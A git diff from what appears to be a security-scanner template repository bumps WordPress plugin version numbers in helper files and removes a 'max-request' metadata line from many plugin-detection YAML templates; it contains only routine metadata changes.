 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 209 files changed, 9 insertions(+), 209 deletions(-)

diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt
index 486d18abb2..954bbe23aa 100644
--- a/helpers/wordpress/plugins/ad-inserter.txt
+++ b/helpers/wordpress/plugins/ad-inserter.txt
@@ -1 +1 @@
-2.7.30
\ No newline at end of file
+2.7.31
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/antispam-bee.txt b/helpers/wordpress/plugins/antispam-bee.txt
index e13ec79f55..9fb6511900 100644
--- a/helpers/wordpress/plugins/antispam-bee.txt
+++ b/helpers/wordpress/plugins/antispam-bee.txt
@@ -1 +1 @@
-2.11.4
\ No newline at end of file
+2.11.5
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt
index f32f950cd9..84799ae9fb 100644
--- a/helpers/wordpress/plugins/jetpack.txt
+++ b/helpers/wordpress/plugins/jetpack.txt
@@ -1 +1 @@
-12.6
\ No newline at end of file
+12.6.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt
index fc3e003067..f18c8f5e2b 100644
--- a/helpers/wordpress/plugins/ninja-forms.txt
+++ b/helpers/wordpress/plugins/ninja-forms.txt
@@ -1 +1 @@
-3.6.31
\ No newline at end of file
+3.6.32
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index a01f0240aa..7491cf3bcc 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.10.8
\ No newline at end of file
+4.10.9
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt
index 186bf70f05..99aa1876b3 100644
--- a/helpers/wordpress/plugins/seo-by-rank-math.txt
+++ b/helpers/wordpress/plugins/seo-by-rank-math.txt
@@ -1 +1 @@
-1.0.201.1
\ No newline at end of file
+1.0.202
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index 04757a5d3c..4be2c727ad 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.4.2
\ No newline at end of file
+6.5.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt
index 1ce954a083..bd1523922a 100644
--- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt
+++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt
@@ -1 +1 @@
-10.7
\ No newline at end of file
+10.8
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt
index b81ba511f6..7104585f9a 100644
--- a/helpers/wordpress/plugins/wp-seopress.txt
+++ b/helpers/wordpress/plugins/wp-seopress.txt
@@ -1 +1 @@
-6.9.1
\ No newline at end of file
+7.0
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
